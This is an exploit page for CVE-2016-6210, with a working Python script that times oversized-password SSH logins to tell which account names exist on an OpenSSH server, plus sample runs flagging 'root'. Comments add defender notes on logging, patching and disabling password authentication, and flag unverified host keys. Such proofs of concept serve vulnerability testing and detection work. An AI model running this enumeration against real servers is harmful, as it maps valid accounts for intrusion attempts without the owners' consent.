# CVE-2016-6210: OpenSSH sshd user enumeration (timing side channel)


# cat ssh_user_enumeration.py
import paramiko
import sys
import time

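# Timing check for CVE-2016-6210.
#
# One password login is attempted with a deliberately oversized password and
# the wall-clock time until the attempt ends is measured. Per the advisory
# referenced on this page, an affected sshd takes measurably longer to reject
# such a password when the account exists than when it does not.
#
# Arguments (positional, all required):
#   argv[1]  target host
#   argv[2]  TCP port of sshd
#   argv[3]  account name to time
#   argv[4]  threshold in whole seconds; 0 prints the raw timing, any other
#            value prints "username timing" only when the timing reaches it
#
# Defender notes: every run should leave a failed password login for
# `username` in the server's authentication log, so a burst of failures across
# many account names from one source is the signal to alert on. The remedy is
# an OpenSSH release that carries the fix for CVE-2016-6210; turning password
# authentication off (keys only) should remove this code path altogether.
target = sys.argv[1]
port = int(sys.argv[2])
username = sys.argv[3]
# 25000 characters: large enough that the server-side password hashing cost
# dominates the round trip.
password = 'Z' * 25000
limit = int(sys.argv[4])

ssh = paramiko.SSHClient()
# NOTE(review): AutoAddPolicy accepts whatever host key the server presents,
# so the identity of the host being measured is not verified.
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

# Start the clock outside the try block and stop it in `finally`, so that
# `endtime` is always defined. The original assigned it only in the except
# branch and failed with NameError whenever connect() returned normally.
starttime = time.time()
try:
    ssh.connect(target, port=port, username=username, password=password)
except Exception:
    # A rejected login is the expected outcome. Connection errors land here
    # too, so a (meaningless, usually very short) timing is still reported
    # when no authentication took place. Unlike the original bare `except:`,
    # Ctrl-C and SystemExit are no longer swallowed.
    pass
finally:
    endtime = time.time()
    # Close after the clock stops so teardown is not part of the measurement.
    ssh.close()

total = endtime - starttime

# %-formatting yields the same text as the original print statements and is
# also valid under Python 3.
if limit == 0:
    print("%s" % total)
elif limit <= total:
    print("%s %s" % (username, total))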

# python ssh_user_enumeration.py 127.0.0.1 22 user1 0
2.32467317581
# python ssh_user_enumeration.py 127.0.0.1 22 user2 0
2.62516498566
# python ssh_user_enumeration.py 127.0.0.1 22 root 3
root 7.46048903465
# python ssh_user_enumeration.py 127.0.0.1 22 user3 3

Reference

http://seclists.org/fulldisclosure/2016/Jul/51
